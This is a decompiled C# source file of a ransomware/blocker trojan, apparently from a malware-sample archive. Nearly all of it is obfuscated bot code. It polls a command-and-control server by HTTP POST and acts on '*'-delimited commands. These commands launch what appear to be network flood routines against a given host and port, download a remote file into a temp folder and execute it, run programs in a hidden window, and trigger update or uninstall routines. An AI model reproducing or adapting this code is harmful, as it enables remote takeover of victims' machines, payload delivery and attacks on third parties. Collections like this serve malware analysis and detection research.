MalwareSourceCode/MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/c9b81b1a3e4ee51d08f5de2448e459036.cs

283 lines
12 KiB
C#
Raw Normal View History

2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: A.c9b81b1a3e4ee51d08f5de2448e459036
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Text;
using System.Threading;
namespace A
{
internal class c9b81b1a3e4ee51d08f5de2448e459036
{
private string c749d615fce46a65e549ecd0269efb309 = string.Empty;
public void ccca4f7e07f327977d582f4cecb7af4cd()
{
this.c70c0917b5d671ac9ae9d4e7f861b66d0();
new Thread(new ThreadStart(this.ca33aa6acdace65e5414a966dd1dc03ae)).Start();
}
private void c70c0917b5d671ac9ae9d4e7f861b66d0()
{
string c2cbf7d2e1f35e8102d156c340d5f99cb = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1377) + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c5c0d142f43b2ed4000991109cbc0575f + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1402) + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cdd86f79582ee69b3331f0a01a8458c64 + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1419) + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c08c5101a594b5e3a22d4e523b7baa2b1 + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1436) + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c8d4d9680af49d6d5dcc86b05695287f2;
while (true)
{
try
{
string str = this.c372676659fe6f48f27b1ad11ccb40951(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.ce6b1c08295456824d707adffcd771c22, c2cbf7d2e1f35e8102d156c340d5f99cb);
if (str.Length > 0)
{
if (str == c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cf878f08181d5af12c924fb92b523534b)
break;
Environment.Exit(-1);
}
}
catch
{
}
Thread.Sleep(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cddb71d8bcf007ee24cca0a5fc8c9f9d1 * 60 * 1000);
}
}
private void ca33aa6acdace65e5414a966dd1dc03ae()
{
string c2cbf7d2e1f35e8102d156c340d5f99cb = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1453) + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c5c0d142f43b2ed4000991109cbc0575f;
while (true)
{
try
{
string ce500fea65ca5a93a477a5ab3b4c7f34d = this.c372676659fe6f48f27b1ad11ccb40951(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.ce6b1c08295456824d707adffcd771c22, c2cbf7d2e1f35e8102d156c340d5f99cb);
if (ce500fea65ca5a93a477a5ab3b4c7f34d.Length > 0)
{
if (ce500fea65ca5a93a477a5ab3b4c7f34d != this.c749d615fce46a65e549ecd0269efb309)
{
this.c92d05caa41a6d8d9718da94fb32596c8(ce500fea65ca5a93a477a5ab3b4c7f34d);
this.c749d615fce46a65e549ecd0269efb309 = ce500fea65ca5a93a477a5ab3b4c7f34d;
}
}
else
{
try
{
c2b32128b27710d76674c1117f7f19ccf.c90f6d098ad5ce70814005fb0adf72870();
}
catch
{
}
try
{
c986963ced362383f6d7b6341e31dcfe7.c451004db98e7b627d5ee87fe743cb383();
}
catch
{
}
try
{
ca2a3d5a1b8d431c404c11a5f27d5064a.c4f970d2f71876e66d1daba6a51237e62();
}
catch
{
}
try
{
cb7379333abfa1ab1cb35304f3a8573ec.cc3c1bbd84093cbd7bdc83bcc5fb3ac15();
}
catch
{
}
this.c749d615fce46a65e549ecd0269efb309 = string.Empty;
}
}
catch
{
}
Thread.Sleep(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cddb71d8bcf007ee24cca0a5fc8c9f9d1 * 60 * 1000);
}
}
private string c372676659fe6f48f27b1ad11ccb40951(
string cf7d7ab02f04f36e1e7781d49924e7769,
string c2cbf7d2e1f35e8102d156c340d5f99cb)
{
ServicePointManager.Expect100Continue = false;
HttpWebRequest httpWebRequest = (HttpWebRequest) WebRequest.Create(cf7d7ab02f04f36e1e7781d49924e7769);
httpWebRequest.ContentType = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1478);
httpWebRequest.Method = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1545);
httpWebRequest.UserAgent = c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cf878f08181d5af12c924fb92b523534b;
byte[] bytes = Encoding.ASCII.GetBytes(c2cbf7d2e1f35e8102d156c340d5f99cb);
httpWebRequest.ContentLength = (long) bytes.Length;
Stream requestStream = httpWebRequest.GetRequestStream();
requestStream.Write(bytes, 0, bytes.Length);
requestStream.Close();
WebResponse response = httpWebRequest.GetResponse();
return response == null ? string.Empty : new StreamReader(response.GetResponseStream()).ReadToEnd().Trim();
}
private void c92d05caa41a6d8d9718da94fb32596c8(string ce500fea65ca5a93a477a5ab3b4c7f34d)
{
string[] strArray = new string[0];
try
{
strArray = ce500fea65ca5a93a477a5ab3b4c7f34d.Split('*');
}
catch
{
}
string key;
if ((key = strArray[0]) == null)
return;
// ISSUE: reference to a compiler-generated field
if (c7bada025401008fe87db7163fb8faf48.c139b1fcd81f6e8b23501dbbfe6bf01fc == null)
{
// ISSUE: reference to a compiler-generated field
c7bada025401008fe87db7163fb8faf48.c139b1fcd81f6e8b23501dbbfe6bf01fc = new Dictionary<string, int>(8)
{
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1554),
0
},
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1571),
1
},
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1590),
2
},
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1607),
3
},
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1626),
4
},
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1643),
5
},
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1654),
6
},
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1667),
7
}
};
}
int num;
// ISSUE: reference to a compiler-generated field
// ISSUE: explicit non-virtual call
if (!__nonvirtual (c7bada025401008fe87db7163fb8faf48.c139b1fcd81f6e8b23501dbbfe6bf01fc.TryGetValue(key, out num)))
return;
switch (num)
{
case 0:
try
{
c2b32128b27710d76674c1117f7f19ccf.c966ab90271ad8729ab4aa4181c310abf = Convert.ToString(strArray[1]);
c2b32128b27710d76674c1117f7f19ccf.cf7dbbb0d9526e45865da4ee3fb9e1488 = ushort.Parse(strArray[2]);
c2b32128b27710d76674c1117f7f19ccf.c1e5fb6eadf8fa36fbb78b515080241e1 = Convert.ToInt32(strArray[3]);
c2b32128b27710d76674c1117f7f19ccf.c52cb3c9fa9ea96db544af1bec7b932c8 = Convert.ToInt32(strArray[4]);
c2b32128b27710d76674c1117f7f19ccf.c68372a86611194582de7bf4f45c72f47();
break;
}
catch
{
break;
}
case 1:
try
{
c986963ced362383f6d7b6341e31dcfe7.c966ab90271ad8729ab4aa4181c310abf = Convert.ToString(strArray[1]);
c986963ced362383f6d7b6341e31dcfe7.c1e5fb6eadf8fa36fbb78b515080241e1 = Convert.ToInt32(strArray[2]);
c986963ced362383f6d7b6341e31dcfe7.cef8e53905308fbf449ffc06b3aecf429();
break;
}
catch
{
break;
}
case 2:
try
{
ca2a3d5a1b8d431c404c11a5f27d5064a.c966ab90271ad8729ab4aa4181c310abf = Convert.ToString(strArray[1]);
ca2a3d5a1b8d431c404c11a5f27d5064a.cf7dbbb0d9526e45865da4ee3fb9e1488 = ushort.Parse(strArray[2]);
ca2a3d5a1b8d431c404c11a5f27d5064a.c1e5fb6eadf8fa36fbb78b515080241e1 = Convert.ToInt32(strArray[3]);
ca2a3d5a1b8d431c404c11a5f27d5064a.ce1f122b7ea8865781912d724c92b0e28 = Convert.ToInt32(strArray[4]);
ca2a3d5a1b8d431c404c11a5f27d5064a.cced20ebbb17c5b4c22dbd925be9f7bd0 = Convert.ToInt32(strArray[5]);
ca2a3d5a1b8d431c404c11a5f27d5064a.c1e47aee5510fe6af6ef6c306b4a8c34a();
break;
}
catch
{
break;
}
case 3:
try
{
cb7379333abfa1ab1cb35304f3a8573ec.c966ab90271ad8729ab4aa4181c310abf = Convert.ToString(strArray[1]);
cb7379333abfa1ab1cb35304f3a8573ec.cf7dbbb0d9526e45865da4ee3fb9e1488 = ushort.Parse(strArray[2]);
cb7379333abfa1ab1cb35304f3a8573ec.c1e5fb6eadf8fa36fbb78b515080241e1 = Convert.ToInt32(strArray[3]);
cb7379333abfa1ab1cb35304f3a8573ec.cf0383b25e10d922cf775f947a9893ddb = Convert.ToInt32(strArray[4]);
cb7379333abfa1ab1cb35304f3a8573ec.cced20ebbb17c5b4c22dbd925be9f7bd0 = Convert.ToInt32(strArray[5]);
cb7379333abfa1ab1cb35304f3a8573ec.cd351d92ca1a938962136bd5808af7e90();
break;
}
catch
{
break;
}
case 4:
try
{
string str = c57ac7140997a29abffbea04a04f33fc6.c4a101047227d6769ba130216f202ea07.c4028bc68211f16a03921654b4b8b346f(new Random().Next(5, 12)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1680);
new WebClient().DownloadFile(Convert.ToString(strArray[1]), Environment.GetEnvironmentVariable(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1689)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(340) + str);
new Process()
{
StartInfo = {
FileName = (Environment.GetEnvironmentVariable(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1689)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(340) + str)
}
}.Start();
break;
}
catch
{
break;
}
case 5:
try
{
Process process = new Process()
{
StartInfo = new ProcessStartInfo(Convert.ToString(strArray[1]))
};
process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
process.Start();
break;
}
catch
{
break;
}
case 6:
c57ac7140997a29abffbea04a04f33fc6.cb5ecebe7cbd234304d7228da096a3fa0.c32ad199a1a1b21b2f3794ba8b7927c6b(Convert.ToString(strArray[1]));
break;
case 7:
if (!(strArray[1] == Environment.MachineName) && !(strArray[1].ToUpper() == c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1698)))
break;
c57ac7140997a29abffbea04a04f33fc6.cb5ecebe7cbd234304d7228da096a3fa0.ceaf8f38b42d6fe6312cc350ddb4ba0d6();
break;
}
}
}
}